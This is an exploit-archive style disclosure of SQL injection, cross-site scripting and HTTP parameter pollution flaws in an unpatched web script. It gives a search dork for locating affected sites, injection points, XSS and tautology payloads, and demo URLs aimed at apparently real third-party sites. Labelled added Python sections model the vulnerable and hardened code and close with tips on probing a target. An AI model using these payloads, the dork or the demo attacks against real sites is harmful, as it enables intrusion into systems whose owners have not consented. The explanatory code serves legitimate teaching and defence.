# FB Solution Inc Multiple Exploit
# SQL Injection
# XSS (Cross Site Scripting)
# HTTP Parameter Pollution
## Full Disclosure
#Exploit Title : FB Solution Multiple Exploit
#Exploit Author : Dz MinD injector
#Date : 03/12/2015
#Home : Algeria
#Home Fb : http://www.facebook.com/pokeme23
#Dork : "Designed and Developed By FB Solution Inc"
#Status : Not Patched
1. Description
[+] SQL injection is reachable through several parameters: gamepreview.php?id=, games.php?cat= and music.php?cat=
[+] The script is also vulnerable to Cross Site Scripting (XSS).
Cross site scripting (XSS) is a vulnerability that lets an attacker deliver malicious code
(usually JavaScript) to another user. Because the browser cannot tell whether the script should be trusted,
it executes it in the victim's context, giving the attacker access to any cookies or session tokens the browser
holds for the site (unless they are marked HttpOnly) and to any action the victim can perform on the page.
Affected items in this script:
/gamepreview.php
/games.php
/movies
/music.php
/search.php
/videos.php
[+] HTTP Parameter Pollution (HPP) is also possible:
HPP attacks consist of injecting encoded query string delimiters (such as %26 for &)
into existing parameters. If the web application does not properly sanitize the
input before reusing it in another URL or request, the injected delimiter adds or overrides
parameters, and a malicious user can subvert the application's logic to perform either client-side or server-side attacks.
2. POC (Proof Of Concept) =>
SQL Injection:
http://localhost/gamepreview.php?id=[Inject Here]
HTTP/1.1 200 OK
Date: Thu, 03 Dec 2015 17:19:04 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Server: cloudflare-nginx
CF-RAY: 24f0ef360a0425f2-MRS
Content-Length: 61
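The advisory only shows the injection point, not the code behind it. The following is an added example (not the FB Solution script and not the author's code) that models the assumed shape of gamepreview.php?id=, a value concatenated straight into the query, beside a hardened form, and reproduces the error-based check the demo URL (id=1%27) relies on. The table name, columns and rows are constructed for the example.

```python
import sqlite3

# Constructed in-memory stand-in for the site's database. The table name,
# columns and rows are assumptions for this example; the advisory does not
# publish the real schema behind gamepreview.php.
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE games (id INTEGER, title TEXT, published INTEGER)")
    db.executemany(
        "INSERT INTO games VALUES (?, ?, ?)",
        [(1, "Snake", 1), (2, "Tetris", 1), (3, "Unreleased", 0)],
    )
    return db

def preview_vulnerable(db, id_param):
    """Assumed shape of gamepreview.php?id=: the parameter is concatenated
    straight into the query, so the string becomes part of the SQL."""
    sql = "SELECT id, title FROM games WHERE published = 1 AND id = " + id_param
    return db.execute(sql).fetchall()

def preview_safe(db, id_param):
    """Hardened form: validate the type, then bind the value as a parameter so
    the driver never treats it as SQL syntax."""
    if not id_param.isdigit():
        return []
    return db.execute(
        "SELECT id, title FROM games WHERE published = 1 AND id = ?",
        (int(id_param),),
    ).fetchall()

def probe(db, id_param):
    """The error-based check behind the demo URL (id=1%27): a stray quote breaks
    the statement and the database complains. Returns 'error' on a syntax
    error, otherwise the number of rows the vulnerable query returned."""
    try:
        return len(preview_vulnerable(db, id_param))
    except sqlite3.OperationalError:
        return "error"

if __name__ == "__main__":
    db = make_db()
    print(probe(db, "1"))                # prints 1: normal use, one row
    print(probe(db, "1'"))               # prints 'error': the quote reaches the SQL parser
    print(probe(db, "0 OR 1=1"))         # prints 3: AND binds tighter than OR, published filter bypassed
    print(preview_safe(db, "0 OR 1=1"))  # prints []: the hardened form rejects the input
```

The third probe is the part worth noting: because AND binds tighter than OR, `published = 1 AND id = 0 OR 1=1` returns every row, including the unpublished one, which is how a "harmless" filter on a page like this gets bypassed.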
Cross Site Scripting (XSS):
http://localhost/games.php?cat=><h1> XsseD </h1>
or
http://localhost//music.php?cat=><h1> XsseD </h1>
The other affected items listed above follow the same pattern.
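The leading `>` in the POC payload suggests the cat value is reflected into an unquoted HTML attribute, so the first `>` closes the tag and everything after it becomes markup. The following is an added example (not the FB Solution script and not the author's code) that renders a page in that assumed shape beside a hardened version, and uses Python's HTML tokenizer to show which tags actually end up in the document. The form markup is constructed for the example; only the payload comes from the advisory.

```python
import html
from html.parser import HTMLParser

# Payload taken from the advisory's POC for games.php?cat=
PAYLOAD = "><h1> XsseD </h1>"

def render_vulnerable(cat):
    """Assumed shape of the affected pages: the category is echoed into an
    unquoted attribute with no encoding, which is why a leading '>' in the
    payload is enough to close the tag and start injecting markup."""
    return ('<form action="games.php">'
            '<input type="hidden" name="cat" value=' + cat + '>'
            '<input type="submit" value="Filter">'
            '</form>')

def render_safe(cat):
    """Hardened form: quote the attribute and HTML-encode the value
    (quote=True also encodes the quote characters that could end it)."""
    return ('<form action="games.php">'
            '<input type="hidden" name="cat" value="' + html.escape(cat, quote=True) + '">'
            '<input type="submit" value="Filter">'
            '</form>')

class TagCollector(HTMLParser):
    """Records the start tags a browser-like tokenizer sees in the page."""
    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)

def dom_tags(page):
    """Returns the list of element names the tokenizer found, in order."""
    p = TagCollector()
    p.feed(page)
    p.close()
    return p.tags

if __name__ == "__main__":
    print(dom_tags(render_vulnerable(PAYLOAD)))  # h1 appears as a real element
    print(dom_tags(render_safe(PAYLOAD)))        # no h1: the payload stays text
```

The same check applies to the demo payload with `<marquee>`: swap it in for PAYLOAD and the vulnerable render gains a marquee element while the hardened one does not. An `<h1>` is harmless; the same position accepts `<script>` or an `onerror` handler, which is what the description above is warning about.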
HTTP Parameter Pollution:
http://localhost//movies?cat=[Affected parameter]
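The advisory names the affected parameter but not what the page does with it. The following is an added example (not the FB Solution script and not the author's code) that models the mechanism behind a payload like the demo's `cat=All%26n958846`: the front page decodes the value, and an assumed inner request re-inserts it into a new query string without re-encoding, so the hidden `&` becomes a delimiter again. It also shows why the outcome of overriding an existing parameter depends on whether the receiving parser keeps the first or the last duplicate. The `page=1` parameter and the forwarding step are constructed for the example.

```python
from urllib.parse import parse_qs, urlencode

def parse_last_wins(query):
    """PHP-style: $_GET keeps the last value of a repeated name (assumed
    model of the affected script; other stacks keep the first)."""
    return {k: v[-1] for k, v in parse_qs(query, keep_blank_values=True).items()}

def parse_first_wins(query):
    """Model of a parser that keeps the first occurrence of a name."""
    return {k: v[0] for k, v in parse_qs(query, keep_blank_values=True).items()}

def forward_vulnerable(cat):
    """Assumed inner request built by /movies: the already-decoded category
    is glued into a new query string with no re-encoding, so an '&' inside
    the value becomes a delimiter again. page=1 is constructed for the example."""
    return "cat=" + cat + "&page=1"

def forward_safe(cat):
    """Hardened form: re-encode the value whenever it goes back into a URL."""
    return urlencode({"cat": cat, "page": "1"})

def relay(raw_query, forward, backend_parse=parse_last_wins):
    """Full chain: the front page decodes the client's query string, forwards
    the cat value, and the result is what the backend parser ends up with."""
    cat = parse_last_wins(raw_query)["cat"]
    return backend_parse(forward(cat))

if __name__ == "__main__":
    # Encoded delimiter as in the advisory's demo (cat=All%26n958846):
    # the backend gains a parameter the client never sent directly.
    print(relay("cat=All%26n958846", forward_vulnerable))
    print(relay("cat=All%26n958846", forward_safe))
    # Overriding an existing parameter depends on which duplicate the backend keeps.
    print(relay("cat=All%26page%3D999", forward_vulnerable, parse_first_wins)["page"])
    print(relay("cat=All%26page%3D999", forward_vulnerable, parse_last_wins)["page"])
```

When testing HPP on a target, send both `cat=a&cat=b` and the encoded form, and compare which value the page acts on: that tells you which duplicate wins on that stack and whether a decoded value is being reused unencoded somewhere behind the front page.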
3. Demo:
SQL Injection:
http://www.funXdady.com/gamepreview.php?id=1%27
XSS:
http://sirXfleo.com/moviepreview.php?id=%3E%3Cmarquee%3E%3Ch1%3E%20XsseD%20By%20Dz%20MinD%20Injector%3C/marquee%3E%3C/h1%3E
HTTP Parameter Pollution:
http://www.osnfun.com//movies?cat=All%26n958846%
# Enjoy
# GreetZ ToO : Sige Dz - Dz Vatou - Kilwaa Dz & All Algeria HackerZ
#End
# Free Palestine